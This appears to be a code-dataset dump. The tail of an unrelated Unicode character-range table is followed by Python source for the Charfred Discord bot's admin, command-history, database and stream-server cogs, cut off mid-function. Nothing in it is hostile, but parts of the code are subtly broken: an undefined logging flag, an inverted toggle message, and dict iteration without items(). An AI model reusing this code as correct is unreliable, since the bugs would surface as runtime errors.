[\u25b2-\u25b4] 3695 \\u25b2-\\u25b4 ▲△▴
[\u25c6-\u25c7] 205 \\u25c6-\\u25c7 ◆◇
[\u25ca-\u25cb] 339 \\u25ca-\\u25cb ◊○
[\u25ce-\u25cf] 767 \\u25ce-\\u25cf ◎●
[\u2605-\u2606] 196 \\u2605-\\u2606 ★☆
[\u2609] 3 \\u2609 ☉
[\u2610] 35 \\u2610 ☐
[\u2640] 1017 \\u2640 ♀
[\u2642] 1108 \\u2642 ♂
[\u2666] 2 \\u2666 ♦
[\u266a-\u266b] 9 \\u266a-\\u266b ♪♫
[\u2714] 4 \\u2714 ✔
[\u2717] 1 \\u2717 ✗
[\u274f] 1 \\u274f ❏
[\u2751] 2 \\u2751 ❑
[\u279f] 1 \\u279f ➟
[\u27a2] 6 \\u27a2 ➢
[\u27a5] 1 \\u27a5 ➥
[\u2a7d] 3 \\u2a7d ⩽
[\u2fd4] 2 \\u2fd4 ⿔ CJK++
[\u3001-\u301e] 7028921 \\u3001-\\u301e CJK punc
[\u3022-\u3025] 8 \\u3022-\\u3025 〢〣〤〥
[\u3105-\u3107] 8 \\u3105-\\u3107 ㄅㄆ
[\u310a] 1 \\u310a ㄊ
[\u3111] 1 \\u3111 ㄑ
[\u3113] 2 \\u3113 ㄓ
[\u3116-\u3117] 6 \\u3116-\\u3117 ㄖㄗ
[\u311a-\u311b] 2 \\u311a-\\u311b ㄚㄛ
[\u3122] 1 \\u3122 ㄢ
[\u3125] 1 \\u3125 ㄥ
[\u3127-\u3128] 11 \\u3127-\\u3128 ㄧㄨ
[\u3220-\u3229] 312 \\u3220-\\u3229 ㈠㈡㈢㈣㈤㈥㈦㈧㈨
[\u32a3] 6 \\u32a3 ㊣
[\u338e-\u338f] 125 \\u338e-\\u338f ㎎㎏
[\u339c-\u339d] 75 \\u339c-\\u339d ㎜㎝
[\u33a1] 59 \\u33a1 ㎡
[\u33a5] 1 \\u33a5 ㎥
[\u33d5] 24 \\u33d5 ㏕
[\u33d1-\u33d2] 9 \\u33d1-\\u33d2 ㏑㏒
[\u359e] 6 \\u359e 㖞
[\u39d1] 3 \\u39d1 㧑
[\u41f2] 13 \\u41f2 䇲
[\u4341] 2 \\u4341 䍁
[\u4d13] 2 \\u4d13 䴓
[\u4d15] 1 \\u4d15 䴕
[\u4e00-\u9fff] 13056199 \\u4e00-\\u9fff CJK
[\uacf3] 2 \\uacf3 곳 朝鲜++
[\ucd38] 1 \\ucd38 촸 朝鲜++
[\ue20c-\ue2ff] 1305 \\ue20c-\\ue2ff ???
[\uf900-\ufaff] 136 \\uf900-\\ufaff CJK ++
[\ufb03] 1 \\ufb03 ffi
[\ufe30-\ufe31] 941 \\ufe30-\\ufe31 ︰︱
[\ufe33] 2 \\ufe33 ︳
[\ufe38] 4 \\ufe38 ︸
[\ufe3c-\ufe3d] 33 \\ufe3c-\\ufe3d ︼︽
[\ufe3f-\ufe41] 19 \\ufe3f-\\ufe41 ︿﹀﹁
[\ufe4d-\ufe4e] 7 \\ufe4d-\\ufe4e ﹍﹎
[\ufe55-\ufe57] 102 \\ufe55-\\ufe57 ﹕﹖﹗
[\ufe59-\ufe5c] 185 \\ufe59-\\ufe5c ﹙﹚﹛
[\ufe5f] 10 \\ufe5f ﹟
[\ufe63] 70 \\ufe63 ﹣
[\ufe65-\ufe66] 551 \\ufe65-\\ufe66 ﹥﹦
[\ufe6a-\ufe6b] 233 \\ufe6a-\\ufe6b ﹪﹫
[\ufeff] 4 \\ufeff arabic ++ # FE70-FEFF
[\uff01] 886 \\uff01 !
[\uff08-\uff09] 622070 \\uff08-\\uff09 ()
[\uff0c] 3445520 \\uff0c ,
[\uff1a] 471609 \\uff1a :
[\uff1f] 9822 \\uff1f ?
[\uff61] 2 \\uff61 。
[\uff63] 1 \\uff63 」
[\uff65] 8 \\uff65 ・
[\uff6c] 2 \\uff6c ャ
[\uff72] 1 \\uff72 イ
[\uff86] 1 \\uff86 ニ
[\uff89] 1 \\uff89 ノ
[\uffe0-\uffe1] 160 \\uffe0-\\uffe1 ¢£
[\uffe3] 7143 \\uffe3  ̄
[\uffe5] 57 \\uffe5 ¥
[\uffed] 9 \\uffed ■
[\ufffc] 1 \\ufffc 
"""
"""
\\u0020-\\u007e Latin
\\u00a0-\\u00ff Latin ++
\\u0100-\\u01ff Latin ++
\\u0251 ɑ
\\u025b ɛ
\\u0261 ɡ
\\u028a ʊ
\\u02c6-\\u02cb ˆˇˈˉˊˋ
\\u02d0 ː
\\u02d8-\\u02da ˘˙˚
\\u02dc ˜
\\u037a ͺ
\\u037e ;
\\u038a Ί
\\u038c Ό
\\u03cb ϋ
\\u03d6 ϖ
\\u0384-\\u0385 ΄΅
\\u0387-\\u0388 ·Έ
\\u038e-\\u038f ΎΏ
\\u0391-\\u03c9 希腊
\\u0400-\\u04ff 西里尔
\\u0590-\\u05ff 希伯来
\\u0652 阿拉伯
\\u11bc 朝鲜
\\u1868 ᡨ 蒙古
\\u1d31 ᴱ
\\u1d52 ᵒ
\\u1d5b ᵛ
\\u1ef7 ỷ Latin ++
\\u2016-\\u206a punc++
\\u2070 ⁰
\\u2074-\\u2075 ⁴⁵
\\u2077-\\u2078 ⁷⁸
\\u2082-\\u2084 ₂₃₄
\\u20ac €
\\u2103 ℃
\\u2105 ℅
\\u2109 ℉
\\u2116 №
\\u2122 ™
\\u212b Å
\\u2160-\\u216b ⅠⅡⅢⅣⅤⅥⅦⅧⅨⅩⅪⅫ
\\u2170-\\u2179 ⅰⅱⅲⅳⅴⅵⅶⅷⅸ
\\u21d2 ⇒
\\u2190-\\u2193 ←↑→↓
\\u2206 ∆
\\u2208 ∈
\\u2211-\\u2212 ∑−
\\u2217-\\u221a ∗∘∙√
\\u221d-\\u2220 ∝∞∟∠
\\u2223 ∣
\\u2225 ∥
\\u2227-\\u222b ∧∨∩∪∫
\\u222e ∮
\\u2234 ∴
\\u2237 ∷
\\u223c-\\u223d ∼∽
\\u2245 ≅
\\u224c ≌
\\u2252 ≒
\\u2260-\\u2261 ≠≡
\\u2264-\\u2267 ≤≥≦≧
\\u226f ≯
\\u2295 ⊕
\\u2299 ⊙
\\u22a5 ⊥
\\u22bf ⊿
\\u2312 ⌒
\\u2395 ⎕
\\u2460-\\u2473 ①②③④⑤⑥⑦⑧⑨⑩ ⑳
\\u2474-\\u2487 ⑴⑵⑶⑷⑸⑹⑺⑻⑼⑽ ⒇
\\u2488-\\u249b ⒈⒉⒊⒋⒌⒍⒎⒏⒐⒑ ⒛
\\u2500-\\u257f ─━│┃┄┅┆┇┈┉┊
\\u25a0-\\u25a1 ■□
\\u25b2-\\u25b4 ▲△▴
\\u25c6-\\u25c7 ◆◇
\\u25ca-\\u25cb ◊○
\\u25ce-\\u25cf ◎●
\\u2605-\\u2606 ★☆
\\u2609 ☉
\\u2610 ☐
\\u2640 ♀
\\u2642 ♂
\\u2666 ♦
\\u266a-\\u266b ♪♫
\\u2714 ✔
\\u2717 ✗
\\u274f ❏
\\u2751 ❑
\\u279f ➟
\\u27a2 ➢
\\u27a5 ➥
\\u2a7d ⩽
\\u2fd4 ⿔ CJK++
\\u3001-\\u301e CJK punc
\\u3022-\\u3025 〢〣〤〥
\\u3105-\\u3107 ㄅㄆ
\\u310a ㄊ
\\u3111 ㄑ
\\u3113 ㄓ
\\u3116-\\u3117 ㄖㄗ
\\u311a-\\u311b ㄚㄛ
\\u3122 ㄢ
\\u3125 ㄥ
\\u3127-\\u3128 ㄧㄨ
\\u3220-\\u3229 ㈠㈡㈢㈣㈤㈥㈦㈧㈨
\\u32a3 ㊣
\\u338e-\\u338f ㎎㎏
\\u339c-\\u339d ㎜㎝
\\u33a1 ㎡
\\u33a5 ㎥
\\u33d5 ㏕
\\u33d1-\\u33d2 ㏑㏒
\\u359e 㖞
\\u39d1 㧑
\\u41f2 䇲
\\u4341 䍁
\\u4d13 䴓
\\u4d15 䴕
\\u4e00-\\u9fff CJK
\\uacf3 곳 朝鲜++
\\ucd38 촸 朝鲜++
\\ue20c-\\ue2ff ???
\\uf900-\\ufaff CJK ++
\\ufb03 ffi
\\ufe30-\\ufe31 ︰︱
\\ufe33 ︳
\\ufe38 ︸
\\ufe3c-\\ufe3d ︼︽
\\ufe3f-\\ufe41 ︿﹀﹁
\\ufe4d-\\ufe4e ﹍﹎
\\ufe55-\\ufe57 ﹕﹖﹗
\\ufe59-\\ufe5c ﹙﹚﹛
\\ufe5f ﹟
\\ufe63 ﹣
\\ufe65-\\ufe66 ﹥﹦
\\ufe6a-\\ufe6b ﹪﹫
\\ufeff arabic ++ # FE70-FEFF
\\uff01 !
\\uff08-\\uff09 ()
\\uff0c ,
\\uff1a :
\\uff1f ?
\\uff61 。
\\uff63 」
\\uff65 ・
\\uff6c ャ
\\uff72 イ
\\uff86 ニ
\\uff89 ノ
\\uffe0-\\uffe1 ¢£
\\uffe3  ̄
\\uffe5 ¥
\\uffed ■
\\ufffc 
"""
``` |
{
"source": "jinkhya/Charfred_Bot",
"score": 2
} |
#### File: Charfred_Bot/admincogs/admin.py
```python
import logging
import datetime
from discord.ext import commands
from utils import Flipbook
log = logging.getLogger(f'charfred.{__name__}')
class Admin(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.cfg = bot.cfg
@commands.command(hidden=True)
@commands.is_owner()
async def cfgreload(self, ctx):
"""Reload cfg.
Useful when you edited botcfg.json
manually.
Will discard all unsaved changes!
"""
log.info('Reloading botcfg.json...')
await self.cfg.load()
log.info('Reloaded!')
await ctx.sendmarkdown('# Locked and reloaded!')
@commands.command(hidden=True)
async def uptime(self, ctx):
"""Returns the current uptime."""
currenttime = datetime.datetime.now()
uptimedelta = currenttime - self.bot.uptime
s = abs(int(uptimedelta.total_seconds()))
d, s = divmod(s, 86400)
h, s = divmod(s, 3600)
m, s = divmod(s, 60)
upstr = f'{d} day(s), {h} hour(s), {m} minute(s) and {s} second(s)'
log.info(f'Up for {upstr}.')
await ctx.sendmarkdown(f'# I have been up for {upstr}!')
@commands.group(invoke_without_command=True)
async def prefix(self, ctx):
"""Bot Prefix commands.
This returns the list of all current prefixes,
if no subcommand was given.
"""
is_owner = self.bot.is_owner(ctx.author)
if is_owner:
out = []
for guild_id, prefixes in self.cfg['prefix'].items():
guild = self.bot.get_guild(int(guild_id))
out.append(f'# {guild.name}:' if guild else f'# {guild_id}:')
out.extend([f'\t {prefix}' for prefix in prefixes])
elif ctx.guild:
out = self.cfg['prefix'][str(ctx.guild.id)]
else:
out = []
out.extend(['# Bot mentions (always work):',
f'<@{self.bot.user.id}> ', f'<@!{self.bot.user.id}> ',
'> There\'s a space after the mentions which is part of the prefix!'])
out = '\n'.join(out)
await ctx.sendmarkdown(f'# Current prefixes:\n{out}')
@prefix.command(hidden=True)
@commands.is_owner()
async def add(self, ctx, *, prefix: str):
"""Add a new prefix."""
if ctx.guild:
log.info(f'Adding a new prefix: {prefix}')
try:
self.cfg['prefix'][str(ctx.guild.id)].append(prefix)
except KeyError:
self.cfg['prefix'][str(ctx.guild.id)] = [prefix]
await self.cfg.save()
await ctx.sendmarkdown(f'# \'{prefix}\' has been registered!')
else:
await ctx.sendmarkdown('< Cannot save prefixes outside of a guild! >')
@prefix.command(hidden=True)
@commands.is_owner()
async def remove(self, ctx, *, prefix: str):
"""Remove a prefix."""
if ctx.guild:
log.info(f'Removing prefix: {prefix}')
try:
self.cfg['prefix'][str(ctx.guild.id)].remove(prefix)
except KeyError:
await ctx.sendmarkdown('< This guild has no saved prefixes. >')
except ValueError:
await ctx.sendmarkdown('> Prefix unknown.')
else:
await self.cfg.save()
await ctx.sendmarkdown(f'# \'{prefix}\' has been unregistered!')
def _parserole(self, role):
if not role:
return 'Owner only'
else:
return role
@commands.group(invoke_without_command=True, hidden=True, aliases=['perms'])
async def permissions(self, ctx):
"""Permission commands.
This returns a list of all current permission nodes
and their minimum required role, if no subcommand was given.
"""
log.info('Listing permission nodes.')
nodelist = list(self.cfg['nodes'].items())
nodelist.sort()
nodeentries = [f'{k}:\n\t{self._parserole(v)}' for k, v in nodelist]
nodeflip = Flipbook(ctx, nodeentries, entries_per_page=12,
title='Permission Nodes', close_on_exit=True)
await nodeflip.flip()
@permissions.command(hidden=True)
@commands.is_owner()
async def edit(self, ctx, node: str):
"""Edit a permission node."""
if node not in self.cfg['nodes']:
await ctx.sendmarkdown(f'> {node} is not registered!')
return
role, _, timedout = await ctx.promptinput('# Please enter the minimum role required'
f' to use {node} commands.\nEnter "everyone"'
' to have no role restriction.\n'
'Enter "owner_only" to restrict to bot owner.')
if timedout:
return
if role == 'owner_only':
self.cfg['nodes'][node] = None
else:
if role == 'everyone' or role == 'Everyone':
role = '@everyone'
self.cfg['nodes'][node] = role
await self.cfg.save()
log.info(f'{node} was edited.')
await ctx.sendmarkdown(f'# Edits to {node} saved successfully!')
@permissions.group(invoke_without_command=True, hidden=True)
async def hierarchy(self, ctx):
"""Role hierarchy commands.
This returns a list of all roles currently in the hierarchy,
if no subcommand was given.
Please note that the order within the hierarchy as listed here
does not matter, in essence this hierarchy only sets which roles
to take into consideration when checking for command permissions.
That way you can have lower ranking members with special roles,
that put them above higher ranking members in the guilds role
hierarchy, but not have them inherit said higher ranking members
command permissions, by just not adding that special role to this
hierarchy.
"""
log.info('Listing role hierarchy.')
if not self.cfg['hierarchy']:
await ctx.sendmarkdown('< No hierarchy set up! >')
else:
hierarchy = '\n'.join(self.cfg['hierarchy'])
await ctx.sendmarkdown(f'# Role hierarchy:\n{hierarchy}')
@hierarchy.command(hidden=True, name='add')
@commands.is_owner()
async def addtohierarchy(self, ctx, role):
"""Adds a role to the hierarchy."""
if role in self.cfg['hierarchy']:
await ctx.sendmarkdown(f'> {role} is already in the hierarchy.')
else:
log.info(f'Adding {role} to hierarchy.')
self.cfg['hierarchy'].append(role)
await self.cfg.save()
await ctx.sendmarkdown(f'# {role} added to hierarchy.')
@hierarchy.command(hidden=True, name='remove')
@commands.is_owner()
async def removefromhierarchy(self, ctx, role):
"""Removes a role from the hierarchy."""
if role not in self.cfg['hierarchy']:
await ctx.sendmarkdown(f'> {role} was not in hierarchy.')
else:
log.info(f'Removing {role} from hierarchy.')
self.cfg['hierarchy'].remove(role)
await self.cfg.save()
await ctx.sendmarkdown(f'# {role} removed from hierarchy.')
@commands.group(invoke_without_command=True, hidden=True, aliases=['cogcfgs'])
@commands.is_owner()
async def cogcfg(self, ctx):
"""Cog-specific configuration commands.
This returns a list of all currently known cog-specific
configurations and their current values, if no subcommand was given.
"""
log.info('Listing cog specific configurations.')
cogcfgs = list(self.cfg['cogcfgs'].items())
cogcfgs.sort()
cogcfgentries = [f'{k}:\n\t{v[0]}' for k, v in cogcfgs]
cogcfgflip = Flipbook(ctx, cogcfgentries, entries_per_page=12,
title='Cog-specific Configurations')
await cogcfgflip.flip()
@cogcfg.command(hidden=True, name='edit')
@commands.is_owner()
async def cogcfgedit(self, ctx, cfg: str):
"""Edit cog-specific configuration."""
if cfg not in self.cfg['cogcfgs']:
await ctx.sendmarkdown(f'> {cfg} is not registered!')
return
prompt = self.cfg['cogcfgs'][cfg][1]
value, _, timedout = await ctx.promptinput(prompt)
if timedout:
return
self.cfg['cogcfgs'][cfg] = (value, prompt)
await self.cfg.save()
log.info(f'{cfg} was edited.')
await ctx.sendmarkdown(f'# Edits to {cfg} saved successfully!')
@commands.command(hidden=True)
@commands.is_owner()
async def debughook(self, ctx, hookurl: str=None):
"""Returns and/or changes webhook url used for debugging purposes."""
if 'hook' in self.cfg and self.cfg['hook'] is not None:
await ctx.sendmarkdown(f'> Current debug webhook:\n> {self.cfg["hook"]}')
if hookurl:
self.cfg['hook'] = hookurl
await self.cfg.save()
log.info('Changed debug webhook url.')
await ctx.sendmarkdown(f'> Set debug webhook to:\n> {hookurl}')
def setup(bot):
bot.add_cog(Admin(bot))
```
#### File: Charfred_Bot/admincogs/commandhistorian.py
```python
import logging
import pprint
import asyncio
import discord
from copy import copy
from collections import namedtuple
from discord.errors import Forbidden, NotFound
from discord.ext import commands
from utils import SizedDict
log = logging.getLogger(f'charfred.{__name__}')
Command = namedtuple('Command', 'msg output')
class CommandHistorian(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.botCfg = bot.cfg
self.loop = bot.loop
self.lock = asyncio.Lock()
self.pprinter = pprint.PrettyPrinter()
if not hasattr(bot, 'cmd_map'):
self.cmd_map = SizedDict()
bot.cmd_map = self.cmd_map
else:
self.cmd_map = bot.cmd_map
@commands.Cog.listener()
async def on_command(self, ctx):
"""Saves message attached to command context to the command map,
and optionally logs command to users command history file.
"""
self.cmd_map[ctx.message.id] = Command(
msg=ctx.message,
output=[]
)
@commands.Cog.listener()
async def on_message_delete(self, message):
"""Deletes command output if original invokation
message is deleted.
Will only work if the command is still in the
cmd_map and hasn\'t expired yet!
"""
if message.id in self.cmd_map:
log.info('Deleting previous command output!')
try:
await message.channel.delete_messages(self.cmd_map[message.id].output)
except KeyError:
log.error('Deletion of previous command output failed!')
except Forbidden:
log.error('No Permission!')
except NotFound:
log.warning('Some messages not found for deletion!')
else:
del self.cmd_map[message.id]
@commands.Cog.listener()
async def on_message_edit(self, before, after):
"""Reinvokes a command if it has been edited,
and deletes previous command output.
Will only work if the command is still in the
cmd_map and hasn\'t expired yet!
"""
if before.content == after.content:
return
if before.id in self.cmd_map:
log.info('Deleting previous command output!')
try:
await before.channel.delete_messages(self.cmd_map[before.id].output)
except KeyError:
log.error('Deletion of previous command output failed!')
except Forbidden:
log.error('No Permission!')
except NotFound:
log.warning('Some messages not found for deletion!')
else:
log.info(f'Reinvoking: {before.content} -> {after.content}')
del self.cmd_map[before.id]
await self.bot.on_message(after)
def _removefrommap(self, ctx):
log.info('Command removed from command map!')
try:
del self.cmd_map[ctx.message.id]
except KeyError:
pass
@commands.Cog.listener()
async def on_command_error(self, ctx, error):
if isinstance(error, commands.NotOwner):
self._removefrommap(ctx)
elif isinstance(error, commands.CheckFailure):
self._removefrommap(ctx)
elif isinstance(error, commands.MissingPermissions):
self._removefrommap(ctx)
elif isinstance(error, commands.CommandNotFound):
if ctx.message.id not in self.cmd_map:
self.cmd_map[ctx.message.id] = Command(
msg=ctx.message,
output=[]
)
@commands.command(aliases=['!!'])
async def last(self, ctx):
"""Reinvokes the last command executed by the user.
Specifically the last command invoked in the channel that 'last'
was invoked in.
"""
lastcmd = self.cmd_map.find(lambda cmd: (cmd.msg.channel.id == ctx.channel.id) and
(cmd.msg.author.id == ctx.author.id))
if lastcmd:
log.info('Last command found, reinvoking...')
await self.bot.on_message(lastcmd.msg)
else:
log.info('No last command found!')
await ctx.sendmarkdown('> No recent command found in current channel!')
async def rejig_ctx(self, ctx, content=None, author=None, channel=None):
"""Create a copy of a Context with some variables changed."""
copiedmsg = copy(ctx.message)
if content:
copiedmsg.content = content
if author:
copiedmsg.author = author
if channel:
copiedmsg.channel = channel
return await ctx.bot.get_context(copiedmsg)
@commands.command(hidden=True)
@commands.is_owner()
async def su(self, ctx, user: discord.User, *, cmd: str):
"""Substitute user, like the unix command!"""
try:
user = ctx.guild.get_member(user.id) or user
except AttributeError:
pass
rectx = await self.rejig_ctx(ctx, content=f'{ctx.prefix}{cmd}', author=user)
if rectx.command:
await rectx.command.invoke(rectx)
else:
await ctx.sendmarkdown(f'No valid command for "{rectx.invoked_with}" found!')
@commands.command(hidden=True)
@commands.is_owner()
async def cast(self, ctx, channel: discord.TextChannel, *, cmd: str):
"""Cast a command to another channel."""
rectx = await self.rejig_ctx(ctx, content=f'{ctx.prefix}{cmd}', channel=channel)
if rectx.command:
await rectx.command.invoke(rectx)
else:
await ctx.sendmarkdown(f'No valid command for "{rectx.invoked_with}" found!')
@commands.group(hidden=True, invoke_without_command=True)
@commands.is_owner()
async def cmdlogging(self, ctx):
"""Command logging commands.
Returns whether logging is currently enabled or not,
if no subcommand is given.
"""
log.info('Logging is currently ' + ('active!' if self.logcmds else 'inactive!'))
await ctx.sendmarkdown('# Logging is currently ' + ('active!' if self.logcmds else 'inactive!'))
@cmdlogging.command(hidden=True)
@commands.is_owner()
async def toggle(self, ctx):
"""Toggles command logging on and off."""
if self.logcmds:
self.logcmds = False
else:
self.logcmds = True
log.info('Toggled command logging ' + ('off!' if self.logcmds else 'on!'))
await ctx.sendmarkdown('# Toggled command logging ' + ('off!' if self.logcmds else 'on!'))
@commands.group(invoke_without_command=True, hidden=True)
@commands.is_owner()
async def cmdmap(self, ctx):
"""Command Map commands.
This returns a crude list of the current command map state,
if no subcommand was given.
"""
log.info('Showing cmd_map.')
rep = self.pprinter.pformat(self.cmd_map)
await ctx.sendmarkdown(rep)
@cmdmap.command(hidden=True)
@commands.is_owner()
async def clear(self, ctx, max_size: int=100):
"""Clears the current command map.
Optionally takes a number for the maximum
size of the command map.
"""
if max_size > 1:
log.info(f'Clearing cmd_map, setting maximum size to: {max_size}.')
self.cmd_map.clear()
self.cmd_map.max_size = max_size
await ctx.sendmarkdown('Command map cleared, new maximum size set '
f'to {max_size}!')
else:
log.warning('cmd_map clear with insufficient max_size!')
await ctx.sendmarkdown('< Insufficient maximum size, you can\'t '
'even store a single command in there! >')
def setup(bot):
bot.add_cog(CommandHistorian(bot))
```
#### File: Charfred_Bot/utilitycogs/dboperator.py
```python
import logging
from asyncio import wait_for, TimeoutError
from discord.ext import commands
log = logging.getLogger(f'charfred.{__name__}')
class DBOperator(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
self.cfg = bot.cfg
self.db = None
self.queryresult = None
if self.cfg['dbcredentials']:
self.loop.create_task(self._connect())
async def _connect(self):
log.info('Creating database connection pool.')
self.bot.db = self.db = await asyncpg.create_pool(**self.cfg['dbcredentials'])
await self._createtables()
async def _disconnect(self):
log.info('Closing database connection pool...')
try:
await wait_for(self.db.close(), 60, loop=self.loop)
except TimeoutError:
log.critical('Database connection pool closing timed out!')
else:
log.info('Database connection pool closed.')
async def _createtables(self):
async with self.db.acquire() as con:
for (cog, tablecmd) in self.cfg['dbtables']:
await con.execute(tablecmd)
log.info(f'Created table for {cog} using: {tablecmd}')
def cog_unload(self):
if self.db:
self.loop.create_task(self._disconnect())
@commands.group(invoke_without_command=True, hidden=True,
aliases=['db', 'datbase'])
@commands.is_owner()
async def database(self, ctx):
"""Database admin commands.
This returns whether or not a database connection pool
exists, if no subcommand was given.
It is not a guarantee for the pool being usable.
"""
if self.db:
await ctx.sendmarkdown('> Connection pool available.')
else:
await ctx.sendmarkdown('> No connection pool available.')
@database.command(hidden=True)
@commands.is_owner()
async def connect(self, ctx):
"""Creates a connection pool and creates tables.
Make sure database credentials are saved in the bot
configs first. You can use the 'database credentials'
group of commands for this.
"""
if self.db:
await ctx.sendmarkdown('> Connection pool already established!')
else:
await self._connect()
await ctx.sendmarkdown('# Connection pool established, '
'pre-configured tables created.')
@database.command(hidden=True)
@commands.is_owner()
async def execute(self, ctx, command, *args):
"""Runs a given sql command,
use query instead if you want to fetch data.
A variable number of arguments can be given via $n notation.
"""
async with self.db.acquire() as con:
if args:
stat = await con.execute(command, *args)
else:
stat = await con.execute(command)
log.info(stat)
await ctx.sendmarkdown(stat)
@database.command(hidden=True)
@commands.is_owner()
async def query(self, ctx, query, *args):
"""Runs a given sql query and caches returned Record list,
use execute instead if you do not want to fetch any data.
Cached Record list can be accessed with the `record read`
subcommand.
"""
async with self.db.acquire() as con:
if args:
rec = await con.fetch(query, args)
else:
rec = await con.fetch(query)
self.queryresult = rec
log.info(f'# Query cached with {len(rec)} rows!')
await ctx.sendmarkdown(f'# Query cached with {len(rec)} rows!')
@database.group(invoke_without_command=False, hidden=True)
@commands.is_owner()
async def record(self, ctx):
pass
@record.command(hidden=True)
@commands.is_owner()
async def read(self, ctx):
"""TODO
"""
pass
@database.group(invoke_without_command=True, hidden=True)
@commands.is_owner()
async def credentials(self, ctx):
"""Database credentials commands.
Returns the currently saved credentials,
if no subcommand is given.
"""
out = []
for k, v in self.cfg['dbcredentials']:
out.append(f'{k}: {v}')
if out:
out.insert(0, '# Saved credentials:\n\n')
log.info('\n'.join(out))
await ctx.sendmarkdown('\n'.join(out))
else:
log.info('< No credentials saved! >')
await ctx.sendmarkdown('< No credentials saved! >')
@credentials.command(hidden=True)
@commands.is_owner()
async def set(self, ctx, *args):
"""Save given credentials to bot config.
"""
creds = ['database', 'host', 'port', 'user', 'password']
self.cfg['dbcredentials'] = {}
for (k, v) in zip(creds, args):
self.cfg['dbcredentials'][k] = v
await self.cfg.save()
log.info('Credentials saved!')
await ctx.sendmarkdown('> Credentials saved, '
'hope you entered them correctly!')
try:
import asyncpg
except ImportError:
log.error('Could not import asyncpg, dboperator not loaded!')
def setup(bot):
pass
else:
def setup(bot):
if 'dbcredentials' not in bot.cfg:
bot.cfg['dbcredentials'] = {}
bot.cfg._save()
if 'dbtables' not in bot.cfg:
bot.cfg['dbtables'] = {}
bot.cfg._save()
bot.add_cog(DBOperator(bot))
```
#### File: Charfred_Bot/utilitycogs/streamserver.py
```python
import logging
import asyncio
from json import loads, JSONDecodeError
from discord.ext import commands
from utils import permission_node
log = logging.getLogger(f'charfred.{__name__}')
class StreamServer(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
self.server = None
self.cfg = bot.cfg
self.handlers = {}
self.loop.create_task(self._start_server())
@property
def running(self) -> bool:
"""Status property, indicating whether the
stream server is running or not.
Returns
-------
bool
True when server is available and serving.
"""
if self.server and self.server.is_serving():
return True
else:
return False
def cog_unload(self):
if self.server:
log.info('Closing server.')
self.server.close()
self.loop.create_task(self.server.wait_closed())
async def _start_server(self):
if self.running:
log.info('Server already running!')
else:
try:
port = self.cfg['streamserverport']
except KeyError:
log.warning('No port configured!')
return
self.server = await asyncio.start_server(
self._connection_handler,
'127.0.0.1',
port,
loop=self.loop
)
log.info('Server started.')
def _close_server(self, wait=True):
if self.server:
log.info('Closing server.')
self.server.close()
if wait:
self.loop.create_task(self.server.wait_closed())
async def _connection_handler(self, reader, writer):
"""Handles the initial handshake upon recieving a new connection,
and checks if a handler is registered for recieving said handshake.
If a handler is found, reader and writer are handed off to it,
if not the connection is dropped.
The handler recieving reader and writer is responsible for when
the connection is closed, outside of the server itself closing.
"""
peer = str(writer.get_extra_info('peername'))
log.info(f'New connection established with {peer}.')
handshake = await reader.readline()
if not handshake:
log.warning(f'No handshake recieved from {peer},'
' dropping connection.')
writer.close()
return
try:
handshake = loads(handshake)
is_handshake = handshake['type'] == 'handshake'
except JSONDecodeError:
log.warning(f'Recieved non-json data from {peer},'
' dropping connection.')
writer.close()
return
except KeyError:
log.warning(f'Malformed handshake recieved from {peer},'
' dropping connection.')
writer.close()
return
if is_handshake:
try:
handler = handshake['handler']
except KeyError:
log.warning(f'{peer} did not specify a handler,'
' dropping connection.')
writer.close()
return
if handler in self.handlers:
self.loop.create_task(self.handlers[handler](reader, writer, handshake))
else:
log.warning(f'Handler "{handler}" specified by {peer} is unknown,'
' dropping connection.')
writer.close()
return
else:
log.warning(f'Initial data from {peer} was not a handshake,'
' dropping connection.')
writer.close()
return
def register_handler(self, handler: str, func) -> None:
"""Registers a new connection handler.
Parameters
----------
handler : str
name of the handler
func : Callable[[asyncio.StreamReader, asyncio.StreamWriter, str], None]
handler callable
"""
log.info(f'Registering {handler}.')
self.handlers[handler] = func
def unregister_handler(self, handler: str) -> None:
"""Unregister a known connection handler.
Parameters
----------
handler : str
name of the handler
"""
if handler in self.handlers:
log.info(f'Unregistering {handler}.')
del self.handlers[handler]
else:
log.info(f'{handler} is not registered.')
async def _serverstatus(self):
if self.running:
return '# Stream Server is up.'
else:
return '< Stream server is down! >'
@commands.group(invoke_without_command=True)
@permission_node(f'{__name__}')
async def streamserver(self, ctx):
"""Stream server commands.
Returns whether or not the server is up.
"""
msg = await self._serverstatus()
await ctx.sendmarkdown(msg)
@streamserver.command()
@permission_node(f'{__name__}')
async def start(self, ctx):
"""Start the stream server."""
await self._start_server()
msg = await self._serverstatus()
await ctx.sendmarkdown(msg)
@streamserver.command()
@permission_node(f'{__name__}')
async def stop(self, ctx):
"""Stop the stream server."""
self._close_server(wait=False)
await self.server.wait_closed()
msg = await self._serverstatus()
await ctx.sendmarkdown(msg)
@streamserver.command()
@permission_node(f'{__name__}.setport')
async def setport(self, ctx, port: int):
"""Set the port the stream server should listen on."""
self.cfg['streamserverport'] = port
await self.cfg.save()
await ctx.sendmarkdown('# Port saved!')
@streamserver.command()
@permission_node(f'{__name__}.disable')
async def disable(self, ctx):
"""Disable the stream server by stopping it and removing
the configured port, preventing the server from
launching again.
Useful in case you want to unload the cog and not have the
server start up when you load it up again.
"""
self._close_server(wait=False)
del self.cfg['streamserverport']
await self.cfg.save()
await self.server.wait_closed()
await ctx.sendmarkdown('# Stream server disabled, port removed '
'from config!')
def setup(bot):
permission_nodes = ['', 'setport', 'disable']
bot.register_nodes([f'{__name__}.{node}' if node else f'{__name__}'
for node in permission_nodes])
bot.add_cog(StreamServer(bot))
```
#### File: Charfred_Bot/utils/context.py
```python
import re
from asyncio import TimeoutError
from discord.ext import commands
from utils import splitup
class CharfredContext(commands.Context):
def prompt_check(self, msg):
return msg.author.id == self.author.id and msg.channel.id == self.channel.id
async def send(self, msg=None, deletable=True, embed=None, codeblocked=False, **kwargs):
"""Helper function to send all sorts of things!
Messages are automatically split into multiple messages if they're too long,
and if the codeblocked parameter is True codeblock formatting is
preserved when such a split occurs.
Returns the message object for the sent message,
if a split was performed only the last sent message is returned.
"""
if (msg is None) or (len(msg) <= 2000):
outmsg = await super().send(content=msg, embed=embed, **kwargs)
if deletable:
try:
self.bot.cmd_map[self.message.id].output.append(outmsg)
except KeyError:
pass
except AttributeError:
pass
return outmsg
else:
msgs = splitup(msg, codeblocked)
